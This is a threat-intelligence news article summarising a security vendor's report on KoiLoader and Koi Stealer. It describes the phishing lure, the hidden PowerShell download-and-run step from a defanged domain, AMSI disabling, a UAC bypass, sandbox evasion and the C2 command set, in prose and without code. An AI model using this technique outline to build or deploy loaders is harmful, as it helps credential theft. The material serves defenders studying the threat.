eSentireβs Threat Response Unit (TRU) has detected an intrusion attempt involving a new version of KoiLoader, a malware loader used to facilitate Command and Control (C&C) and deploy Koi Stealer, an information stealer.
The attack begins with a phishing email carrying a ZIP attachment titled chase_statement_march.zip. Inside: a deceptive .lnk file masquerading as a legitimate document. βThe shortcut file makes use of a well-known, low-severity bug in Windows to effectively conceal the command line arguments when viewing the fileβs properties,β TRU explains in its detailed report.
Clicking it triggers a hidden PowerShell command that downloads two malicious JScript files: g1siy9wuiiyxnk.js and i7z1x5npc.js. These scripts:
Establish scheduled tasks using schtasks.exeSwap execution contexts to create the illusion of system-trusted processesDownload further payloads from compromised websitesβThis technique is being used to evade detection, as the parent process of wscript.exe appears to be svchost.exeβ¦ giving the impression that WScript was launched by a more trustworthy parent process.β
The second script (i7z1x5npc.js) acts as the infectionβs engine room:
Retrieves system info (GUID)Creates a unique file path for persistenceDownloads two PowerShell scripts from casettalecese[.]itUses Invoke-WebRequest and Invoke-Expression to run themThe first script disables Anti-Malware Scan Interface (AMSI); the second loads the KoiLoader binary into memory using shellcode and CreateThread.
Once unpacked, KoiLoaderβs second stage checks for:
Language settings (bails on Russian, Belarusian, Kazakh, etc.)VM artifacts like VirtualBox files and display driversSandbox telltales like dummy Word docs and research environment usernames (e.g., βWDAGUtilityAccountβ, βJoe Cageβ, or βHarry Johnsonβ)System specs (e.g., RAM β₯ 3 GB, running under PowerShell)KoiLoader gains persistence by:
Abusing ICMLuaUtil for a UAC bypass to exclude itself from Defender scanningCreating a scheduled task tied to a script named after the machineβs GUIDCreating a custom mutex based on the volume serial number to prevent duplicate executionFinally, KoiLoader uses PowerShell to download and execute sd4.ps1 or sd2.ps1, both of which:
Download the KoiStealer malwareExecute it via PowerShellBegin systematic data theftKoiStealer is built to extract:
Saved passwordsSystem credentialsSession cookiesBrowser and application dataKoiLoader uses a custom HTTP-based Command and Control (C2) protocol:
Registers the infected host with a GUID, build ID, and X25519 public keySends encrypted system info using a derived shared secretEnters a loop to poll for commands, one per secondCommand options include:
Running shell or PowerShell commandsInjecting payloads into explorer.exe or certutil.exePerforming shutdownsCreating scheduled tasksLoading DLLs dynamicallyTRU has released a Python-based emulation toolkit for researchers to simulate C2 traffic.
The 2025 variant of KoiLoader demonstrates malware engineering at its finest β blending social engineering, multi-layered scripting, anti-analysis techniques, and custom cryptographic C2 channels.